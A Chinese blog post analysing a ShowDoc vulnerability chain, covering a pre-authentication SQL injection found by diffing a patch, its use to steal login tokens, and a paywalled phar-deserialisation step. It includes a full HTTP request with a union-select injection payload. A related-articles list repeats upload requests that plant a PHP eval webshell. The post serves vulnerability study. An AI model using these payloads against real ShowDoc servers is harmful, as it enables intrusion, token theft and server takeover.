showdoc sqli to rce漏洞利用思考

最新推荐文章于 2024-08-22 22:20:50 发布
原创 最新推荐文章于 2024-08-22 22:20:50 发布 · 1.5k 阅读 · 10 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#数据库 #javascript #oracle #firefox #服务器

漏洞版本

sqli <=3.2.5

phar 反序列化 <=3.2.4

漏洞分析

前台sqli

补丁 https://github.com/star7th/showdoc/commit/84fc28d07c5dfc894f5fbc6e8c42efd13c976fda

补丁对比发现,在server/Application/Api/Controller/ItemController.class.php中将$item_id变量从拼接的方式换成参数绑定的形式,那么可以推断,这个点可能存在sql注入。

图片

在server/Application/Api/Controller/ItemController.class.php的pwd方法中,从请求中拿到item_id参数,并拼接到where条件中执行,并无鉴权,由此可判断为前台sql注入。

图片

但在进入sql注入点之前,会从请求中获取captcha_id和captcha参数,该参数需要传入验证码id及验证码进行验证,所以,每次触发注入之前,都需要提交一次验证码。

图片

验证码的逻辑是根据captcha_id从Captcha表中获取未超时的验证码进行比对,验证过后,会将验证码设置为过期状态。

图片

完整拼接的sql语句

SELECT * FROM item WHERE ( item_id = '1' ) LIMIT 1

图片

$password 和 $refer_url 参数都可控,可通过联合查询控制password的值满足条件返回$refer_url参数值,1') union select 1,2,3,4,5,6,7,8,9,0,11,12 --,6对应的是password字段,所以password参数传递6,条件成立,回显传入$refer_url参数,那么就存在sql注入。

图片

图片

POST /server/index.php?s=/Api/Item/pwd HTTP/1.1Host: 172.20.10.1Content-Length: 110Cache-Control: max-age=0Upgrade-Insecure-Requests: 1Origin: http://127.0.0.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Referer: http://127.0.0.1/server/index.php?s=/Api/Item/pwdAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9sec-ch-ua: "Google Chrome";v="125", "Chromium";v="125", "Not.A/Brand";v="24"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-fetch-site: same-originsec-fetch-mode: navigatesec-fetch-dest: documentcookie: PHPSESSID=1r419tk5dmut6vs4etuv656t1q; think_language=zh-CN; XDEBUG_SESSION=XDEBUG_ECLIPSEx-forwarded-for: 127.0.0.1x-originating-ip: 127.0.0.1x-remote-ip: 127.0.0.1x-remote-addr: 127.0.0.1Connection: close
captcha=8856&captcha_id=87&item_id=1')+union+select+1,2,3,4,5,6,7,8,9,0,11,12+--&password=6&refer_url=aGVsbG8=

图片

sqli获取token

鉴权是通过调用server/Application/Api/Controller/BaseController.class.php的checkLogin方法来进行验证。

图片

图片

未登录时,会从请求中拿到user_token参数,再通过user_token在UserToken表中查询,验证是否超时,将未超时记录的uid字段拿到User表中查询,最后将返回的$login_user设置到Session中。

那么只需要通过注入获取到UserToken表中未超时的token,那么就可以通过该token访问后台接口。

phar反序列化rce

最低0.47元/天 解锁文章
盛邦安全
关注
ShowDoc item_id 未授权SQL注入漏洞复现
0xSec
06-05 2093
2024年6月,ShowDoc官方发布新版本修复了一个SQL注入漏洞。鉴于该漏洞无前置条件,易于利用,且默认情况下可暴破用户token获取系统后台权限,建议所有使用该系统的企业尽快升级修复,以确保系统安全。
ShowDoc文件上传漏洞复现
afei001
04-24 2531
目录 1.漏洞概述 2.影响版本 3.漏洞等级 4.漏洞复现 4.1 FOFA实战复现 5.漏洞修复 声明:请勿进行非授权测试,否则后果自负。 1.漏洞概述 ShowDoc是一个非常适合IT团队的在线文档分享工具,它可以加快团队之间沟通的效率。但在ShowDoc中存在远程代码执行漏洞,攻击者可利用漏洞获取服务器权限。 CNVD上关于ShowDoc的文件上传漏洞有好几个,最近的有:CNVD-2020-49480、CNVD-2020-26585。 ...
Showdoc V3.2.5最新版远程代码执行漏洞复现
WuYSec的博客
06-05 1340
ShowDoc是一个功能强大、易于使用、免费开源的文档管理系统。通过ShowDoc,可以方便地使用Markdown语法来书写出美观的API文档、数据字典文档、技术文档、在线Excel文档。攻击者通过SQL注入漏洞获取到token进入后台。进入后台后可结合反序列化漏洞,写入WebShell,从而获取服务器权限。
漏洞复现 | Showdoc反序列化
2301_80115097的博客
07-15 1917
看到了注册功能,showdoc有注册功能我们就不用尝试前台SQL注入了,直接注册就行(题目中的SQL注入多少有点滑稽..)。s=home/index/new_is_writeable&file=phar://../获取到的文件路径。区别就是登录成功后带上了Authorization,所以我们在蚁剑中添加上这样的请求头,即可成功连接。原因就是最开始的访问网页的认证登录框,我们重新开一个浏览器对比一下登录和没有登录区别。打开靶场,弹出了这种登录框,这也成为了后面的一个坑点,记住这个登录框。
ShowDoc文件上传(CNVD-2020-26585)
qq_34341458的博客
04-01 4805
0x01 描述 描述: showdoc一个非常适合IT团队的API文档、技术文档工具。在前台存在文件上传,可以getshell。 0x02 影响范围 fofa搜索语句: app=“ShowDoc” 先访问链接:http://ip:prot/index.php?s=/home/page/uploadImg //文件上传漏洞的链接。如果出现“没有出现上传的文件”,说明可能存在漏洞并可以尝试利用。 0x03 漏洞复现 漏洞地址:http://vulfocus.io/#/dashboard?image_
showdoc 文件上传 (CNVD-2020-26585)漏洞复现
weixin_42675091的博客
09-03 2366
showdoc 文件上传 (CNVD-2020-26585)漏洞复现
ShowDoc 远程代码执行漏洞
weixin_51387754的博客
11-02 2965
漏洞简介 ShowDoc 是一个非常适合 IT 团队的在线文档分享工具,它可以加快团队之间沟通的效率。 漏洞复现 fofa语句: app=“ShowDoc” 抓包 POST /index.php?s=/home/page/uploadImg HTTP/1.1 Host: x.x.x.x User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Accept-Encoding:
Showdoc 远程代码执行漏洞
Lucker_YYY的博客
08-18 799
文中所涉及的技术、思路及工具等相关知识仅供安全为目的的学习使用,任何人不得将其应用于非法用途及盈利等目的,间接使用文章中的任何工具、思路及技术,我方对于由此引起的法律后果概不负责。厂商已发布新版本V3.2.5修复此漏洞,请尽快前往Github下载更新(https://github.com/star7th/showdoc),更新至V3.2.5及以上版本。本文发布的工具和脚本,仅用作测试和学习研究,禁止用于商业用途,不能保证其合法性,准确性,完整性和有效性,请根据情况自行判断。是否需要绕过安全机制。
rce漏洞-ctfshow(71-124)71以后所有
m0_74402888的博客
07-23 1170
_GET[abs]($_GET[acos]) //strlen($content) >= 80,有长度限制,所以利用get命令执行。${PWD:${Z}:${#SHLVL}} 或${PWD:${#}:${#SHLVL}} => /=>/bin/cat flag.php。ob_end_clean():清除缓冲区的内容,并将缓冲区关闭,但不会输出内容。$_GET{abs}($_GET{acos}) //[]在黑名单,用{}代替。SHLVL 被过滤掉,我们使用 ${##} 或者 ${#?
ShowDoc后台文件上传漏洞分析 CNVD-2020-49480(CVE-2021-41745)
afei001
08-06 1009
​ github获取ShowDoc源码,版本:ShowDoc v2.8.2,使用phpstudy本地搭建环境。环境搭建参考官网:ShowDoc
showdoc 文件上传漏洞(cnvd-2020-26585)
xy_wjyjw的博客
10-29 511
刷新页面,点击(Intercept is off)开始抓包。打开虚拟终端,输入命令(dir /tmp),查看flag。替换全部报文,修改Host和一句话木马。用蚁剑连接,连接成功,并添加。发送给respones,showdoc 文件上。在bp网页中打开ip(发送到Repeater。
ShowDoc远程下载导致文件上传漏洞复现 CVE-2021-36440&CVE-2022-1034
afei001
08-07 1373
ShowDoc v2.9.5中,不受限制的文件上传允许远程攻击者通过组件AdminUpdateController.class.php中的'file_url'参数执行任意代码。
0x03 ShowDoc 文件上传漏洞(CNVD-2020-26585)复现
weixin_43263566的博客
08-22 1544
如果能成功访问就说明有可能存在漏洞,是否存在漏洞还需要后续进行上传测试。首先你可以编写个搜索fofa的脚本,用来收集目标ip。然后就可以编写ip验证脚本。
ShowDoc后台文件上传漏洞复现 CVE-2021-41745&CNVD-2020-49480
afei001
08-09 1621
ShowDoc一个非常适合IT团队的在线API文档、技术文档工具。Showdoc存在文件上传漏洞,攻击者可以利用漏洞获取服务器权限。
ShowDoc漏洞学习——CNVD-2020-26585(任意文件上传)
记录并分享学习安全的知识点..
07-24 1640
ShowDoc一个非常适合IT团队的API文档、技术文档工具。2.8.3以下版本的ShowDoc 存在任意文件上传漏洞,攻击者通过构造特殊的数据包可以上传恶意文件控制服务器
showdoc文件上传-vulfocus/showdoc-cnvd_2020_26585:latest 漏洞复现实战
weixin_40416851的博客
12-13 534
ShowDoc是一个非常适合IT团队的在线API文档、技术文档工具。通过showdoc,你可以方便地使用markdown语法来书写出美观的API文档、数据字典文档、技术文档、在线excel文档等等。名称: vulfocus/showdoc-cnvd_2020_26585:latest。使用webshell工具连接,在/tmp目录下存在flag。api_page存在任意文件上传.
漏洞复现-showdoc-文件上传】​vulfocus/showdoc-cnvd_2020_26585
10-10 2663
showdoc-文件上传】API_page存在任意文件上传
漏洞复现-showdoc文件上传_v2.8.3_(CNVD-2020-26585)
qq_58683895的博客
10-27 1907
ShowDoc是一个非常适合IT团队的在线API文档、技术文档工具。通过showdoc,你可以方便地使用markdown语法来书写出美观的API文档、数据字典文档、技术文档、在线excel文档等等。api_page存在任意文件上传.然后剔除掉所有的反斜线,使用蚁剑连接。send发送发现返回结果成功。进入首页,然后刷新bp抓包。volfucs靶场复现。
《CTFshow-Web入门》08. Web 71~80
学习学习学习......
05-05 3033
eval() 利用,ob_end_clean() 绕过,正则绕过、PHP 垃圾回收机制,伪协议 {glob://}、PDO 利用、FFI 利用、include() 利用、伪协议 {php://},{data://}、一句话木马之 Nginx 日志利用
vulfocus/showdoc漏洞
最新发布
09-15
ShowDoc是适合IT团队的在线API文档、技术文档工具,可使用markdown语法书写多种文档。存在文件上传漏洞(CNVD - 2020 - 26585),相关漏洞复现的请求示例如下: 第一个示例请求: ```http POST /index.php?s=/home/page/uploadImg HTTP/1.1 Host: vulfocus.fofa.so:57700 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Accept-Encoding: gzip, deflate Accept: */* Connection: close Content-Type: multipart/form-data; boundary=--------------------------921378126371623762173617 Content-Length: 265 ----------------------------921378126371623762173617 Content-Disposition: form-data; name="editormd-image-file"; filename="test.<>.php" Content-Type: text/plain <?php echo '123_test';@eval($_POST[cmd])?> ----------------------------921378126371623762173617-- ``` 第二个示例请求: ```http POST /index.php?s=/home/page/uploadImg HTTP/1.1 Host: 10.9.47.6:14881 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Accept-Encoding: gzip, deflate Accept: */* Connection: close Content-Type: multipart/form-data; boundary=--------------------------921378126371623762173617 Content-Length: 267 ----------------------------921378126371623762173617 Content-Disposition: form-data; name="editormd-image-file"; filename="test.<>.php" Content-Type: text/plain <?php echo 'hello!!!';@eval($_POST[999])?> ----------------------------921378126371623762173617-- ``` 以上示例反映了该漏洞复现过程中构造的请求内容,通过这些请求可尝试复现showdoc文件上传漏洞(CNVD - 2020 - 26585) [^1][^2][^3]。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值